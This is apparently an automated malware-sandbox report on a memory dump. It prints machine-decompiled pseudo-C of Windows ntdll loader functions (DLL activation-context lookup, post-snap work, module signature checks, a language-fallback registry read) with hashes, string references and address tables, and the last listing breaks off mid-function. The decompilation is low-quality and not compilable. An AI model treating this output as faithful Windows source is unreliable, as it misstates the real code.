HEAP: , xrefs: 00E71DE4

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: e51c537f197a81b55adc8c1ebf166a6010b3bbc51bc4cad21c549db0740c1259
Instruction ID: b124edf28785f0f3708ecbdd2373e1a4718cf3aa4c3baf9dd049f335ede5c7ea
Opcode Fuzzy Hash: e51c537f197a81b55adc8c1ebf166a6010b3bbc51bc4cad21c549db0740c1259
Instruction Fuzzy Hash: 6E5135322047809FD322DB68D845F67B7E8FF80B54F1954A8F595AB2A2D734DC04CB22

Uniqueness

Uniqueness Score: -1.00%

Function 00E38E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00E38E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xefd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xef8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xef5780 & 0x00000003) != 0) {
							E00E85510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xef5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00E4B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xef7984; // 0x9b2af8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xef8464; // 0x74b10110
					 *0xefb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00E39B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xef5780 & 0x00000005) != 0) {
						_push(_t49);
						E00E85510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x00e38e0f
0x00e38e16
0x00e38e19
0x00e38e1b
0x00e38e21
0x00e38e7f
0x00e38e85
0x00e79354
0x00e7936c
0x00e79371
0x00e7937b
0x00e79381
0x00e79381
0x00e7937b
0x00e38e9d
0x00e38e9d
0x00e38e29
0x00e38e2c
0x00e38e38
0x00e38e3e
0x00e38e43
0x00e38eb5
0x00e38eb9
0x00e792aa
0x00e792af
0x00e792e8
0x00e792e8
0x00e792af
0x00e38eb9
0x00e38e45
0x00e38e53
0x00e38e5b
0x00e38e5f
0x00e38e78
0x00e38e78
0x00e38e7d
0x00e38ec3
0x00e38ecd
0x00e38ed2
0x00e38ed2
0x00e38ec5
0x00e38ec5
0x00000000
0x00e38e7d
0x00e38e67
0x00e38ea4
0x00e7931a
0x00000000
0x00000000
0x00e79320
0x00e38ea4
0x00e38e70
0x00e79325
0x00e79340
0x00e79345
0x00e79345
0x00e38e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 00E7933B, 00E79367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00E7932A
Querying the active activation context failed with status 0x%08lx, xrefs: 00E79357
LdrpFindDllActivationContext, xrefs: 00E79331, 00E7935D

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 400a3f8a95f2ef93953e8fc1c7dfb55eca45b92354f83dac5dd47a1b71d9bcce
Instruction ID: 1f674a90a9d56d6f0981a42e3084efe4e56c916345e73be1cbb1bab07c88d7c5
Opcode Fuzzy Hash: 400a3f8a95f2ef93953e8fc1c7dfb55eca45b92354f83dac5dd47a1b71d9bcce
Instruction Fuzzy Hash: F3411932A003119FDB25AB178E4DA75BFB5AB5034CF06616AF858771A1EF70AD84C381

Uniqueness

Uniqueness Score: -1.00%

Function 00EC49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 00EC4A3D, 00EC4AB7
This is located in the %s field of the heap header., xrefs: 00EC4AD6
HEAP: , xrefs: 00EC4A4A, 00EC4A5D, 00EC4A5F, 00EC4AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 00EC4A61

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: c9a2dfd41446f595e78774d4040e4b058b6ce13a0a46ff6f1562351a2e7d0732
Instruction ID: 9e9ca7a07eedac42e157bf129fa87bcbad660e24e8cab9fd9631165e81ef90c7
Opcode Fuzzy Hash: c9a2dfd41446f595e78774d4040e4b058b6ce13a0a46ff6f1562351a2e7d0732
Instruction Fuzzy Hash: 013122B5280240EFC310EB58C9A5F67B3E8FF04724F245069F805FB2D1E672AC85C668

Uniqueness

Uniqueness Score: -1.00%

Function 00E18794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00E18794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00E1934A() != 0) {
								_t159 = E00E8A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xef5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00E85510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xef5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00E1849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00E18999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00E18999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xef5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xef5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00E22280(_t92, 0xef86cc);
															_t94 = E00ED9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00E361A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xef5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00E18A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xef5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xef5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00E4F380(_t136, 0xde1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00E22280(_t108, 0xef86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00E361A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00ED9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00E1FFB0(_t118, _t156, 0xef86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00E49A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x00e18799
0x00e1879d
0x00e187a1
0x00e187a3
0x00e187a8
0x00e187c3
0x00e187c3
0x00e187c8
0x00e187d1
0x00e187d4
0x00e187d8
0x00e187e5
0x00e187ec
0x00e69bfe
0x00e69c00
0x00e69c02
0x00e69c08
0x00e69c0d
0x00e69c0f
0x00e69c14
0x00e69c2d
0x00e69c32
0x00e69c37
0x00e69c3a
0x00e69c3c
0x00e69c42
0x00e69c42
0x00e69c3c
0x00e69c02
0x00e187da
0x00e187df
0x00e187e3
0x00000000
0x00000000
0x00e187e3
0x00e187f2
0x00000000
0x00e187fb
0x00e187fd
0x00e187fe
0x00e1880e
0x00e1880f
0x00e18810
0x00e18814
0x00e1881a
0x00e1881c
0x00e1881f
0x00e18821
0x00e18822
0x00e18824
0x00e18826
0x00e1882c
0x00e1882e
0x00e69c48
0x00e69c48
0x00e18834
0x00e18834
0x00e18837
0x00000000
0x00000000
0x00e18837
0x00e1882e
0x00e1883d
0x00e18840
0x00e18843
0x00e18846
0x00e18849
0x00e1884c
0x00e1884e
0x00e18850
0x00e18852
0x00e18854
0x00e18857
0x00e188b4
0x00e188b6
0x00e188b6
0x00e18859
0x00e18859
0x00e18859
0x00e18861
0x00e18866
0x00e1886a
0x00e1893d
0x00e18941
0x00000000
0x00e18947
0x00e18947
0x00e1894a
0x00e1894c
0x00000000
0x00e18952
0x00e18955
0x00e1895a
0x00e1895d
0x00e1895d
0x00e1895f
0x00e18961
0x00e18961
0x00e18968
0x00000000
0x00000000
0x00e1896a
0x00e1896b
0x00e1896e
0x00000000
0x00e18970
0x00e18970
0x00e18970
0x00e18970
0x00e18972
0x00e18972
0x00e18974
0x00000000
0x00e1897a
0x00e1897a
0x00e1897d
0x00000000
0x00e18983
0x00e69c65
0x00e69c6d
0x00e69c72
0x00e69c75
0x00e69c75
0x00e69c82
0x00e69c86
0x00e69c87
0x00e69c88
0x00e69c89
0x00e69c8c
0x00e69c90
0x00e69c95
0x00e69c97
0x00e69ca0
0x00e69ca3
0x00e69ca9
0x00e69ca9
0x00000000
0x00e69ca9
0x00e69ca3
0x00000000
0x00e69c97
0x00e1897d
0x00000000
0x00e18974
0x00e18988
0x00e18992
0x00e18996
0x00000000
0x00e18996
0x00e1894c
0x00000000
0x00e18870
0x00e1887b
0x00e1887d
0x00e1887f
0x00e18881
0x00e18884
0x00e18884
0x00e18886
0x00e18889
0x00e1888c
0x00e1888e
0x00e18891
0x00e18891
0x00e18898
0x00000000
0x00000000
0x00e1889a
0x00e1889b
0x00e1889e
0x00000000
0x00000000
0x00e188a0
0x00e188a8
0x00e188b0
0x00e188b2
0x00e188d3
0x00e188d5
0x00000000
0x00e188d7
0x00e188db
0x00e188dc
0x00e188e0
0x00e188e8
0x00e188ee
0x00e188f0
0x00e188f3
0x00e188fc
0x00e18901
0x00e18906
0x00e1890c
0x00e1890c
0x00e1890f
0x00e18916
0x00e18917
0x00e18918
0x00e18919
0x00e1891a
0x00e1891f
0x00e18921
0x00e69c52
0x00e69c55
0x00e69c5b
0x00e69cac
0x00e69cc0
0x00e69cc0
0x00e69c55
0x00e18927
0x00e18927
0x00e1892f
0x00e18933
0x00000000
0x00e188f5
0x00e188f5
0x00000000
0x00e188f7
0x00e188f7
0x00e188fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00e188fa
0x00e188f5
0x00e188f3
0x00000000
0x00e188d5
0x00000000
0x00e188b2
0x00e188c9
0x00000000
0x00e188c9
0x00e1887f
0x00e1886a
0x00e18857
0x00e18852
0x00e188bf
0x00e188bf
0x00e187aa
0x00e187ad
0x00e187ae
0x00e187b4
0x00e187b5
0x00e187b6
0x00e187b8
0x00e187bd
0x00e187c1
0x00e187f4
0x00e187fa
0x00000000
0x00000000
0x00000000
0x00e187c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 00E69C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00E69C18
LdrpDoPostSnapWork, xrefs: 00E69C1E

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 239dce006dcdb46c24ff6e9f460e7baaf5223e2b6a3c9ec0fde06c2598cef101
Instruction ID: 5d01f5f9723b0ece9bad93af5812f9bdffdb2bd8ee6cad27377fdda0de6bc9ae
Opcode Fuzzy Hash: 239dce006dcdb46c24ff6e9f460e7baaf5223e2b6a3c9ec0fde06c2598cef101
Instruction Fuzzy Hash: 51910431A002169FDF18DF59CA819FAB7B5FF84304B95616AE905BB291DF30ED81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E17E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00E17E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00E1CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00E0C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xef5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00E85510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xef5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00E27D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00E27D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00E87016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00E27D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00E27D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00E87016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00E3A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00E0B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x00e17e4c
0x00e17e50
0x00e17e55
0x00e17e58
0x00e17e5d
0x00e17e71
0x00e17f33
0x00e17e77
0x00e17e77
0x00e17e79
0x00e17e79
0x00e17e7e
0x00e17f45
0x00e69848
0x00000000
0x00e69848
0x00e17f4e
0x00e17f53
0x00e17f5a
0x00000000
0x00000000
0x00e6985a
0x00e69862
0x00e69866
0x00000000
0x00e6986c
0x00000000
0x00e6986c
0x00e17e84
0x00e17e84
0x00e17e8d
0x00e69871
0x00e17eb8
0x00e17ec0
0x00e17ec0
0x00e17e9a
0x00e6987e
0x00000000
0x00000000
0x00e69884
0x00e6988b
0x00e698a7
0x00e698ac
0x00e698b1
0x00e698b6
0x00e698b8
0x00e698b8
0x00e698b9
0x00000000
0x00e698b9
0x00e17ea0
0x00e17ea7
0x00000000
0x00000000
0x00e17eac
0x00e17eb1
0x00e17ec6
0x00e17ed0
0x00e698cc
0x00e17ed6
0x00e17ed6
0x00e17ed6
0x00e17ede
0x00e17ee3
0x00e698e3
0x00e698f0
0x00e69902
0x00e698f2
0x00e698fb
0x00e698fb
0x00e69907
0x00e6991d
0x00e6991d
0x00e69907
0x00e698e3
0x00e17ef0
0x00e17f14
0x00e17f14
0x00e17f1e
0x00e69946
0x00e17f24
0x00e17f24
0x00e17f24
0x00e17f2c
0x00e6996a
0x00e69975
0x00e69975
0x00e6997e
0x00e69993
0x00e69993
0x00e6997e
0x00000000
0x00e17ef2
0x00e17efc
0x00e17f0a
0x00e17f0e
0x00e69933
0x00000000
0x00e69933
0x00000000
0x00e17f0e
0x00000000
0x00000000
0x00000000
0x00e17eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 00E698A2
LdrpCompleteMapModule, xrefs: 00E69898
Could not validate the crypto signature for DLL %wZ, xrefs: 00E69891

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: aa36d2cfe9fcc3edbb49918ab5db77b20c03b993c73d1dd68b12096ec15c1637
Instruction ID: 5a0320458921cf43a792d25c1366792836020a6a4e7813c36428d9aedf5a73e0
Opcode Fuzzy Hash: aa36d2cfe9fcc3edbb49918ab5db77b20c03b993c73d1dd68b12096ec15c1637
Instruction Fuzzy Hash: 755102316487409FD725CB58C844BAA7BF4BF41B58F24259AE891BB3D2C730ED80C790

Uniqueness

Uniqueness Score: -1.00%

Function 00E0E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00E0E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00E0F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00E495D0();
						}
						if(_t78 != 0) {
							L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00E4FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00E4BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00E49600();
					if(_t97 < 0) {
						goto L6;
					}
					E00E4BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00E0F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00E4BB40(_t83, _t102 + 0x24, _t78);
								if(L00E143C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00E4BB40(_t84, _t102 + 0x24, _t94);
									if(L00E143C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x00e0e620
0x00e0e628
0x00e0e62f
0x00e0e631
0x00e0e635
0x00e0e637
0x00e0e63e
0x00e65503
0x00e65503
0x00e0e64c
0x00e0e64c
0x00e0e651
0x00000000
0x00000000
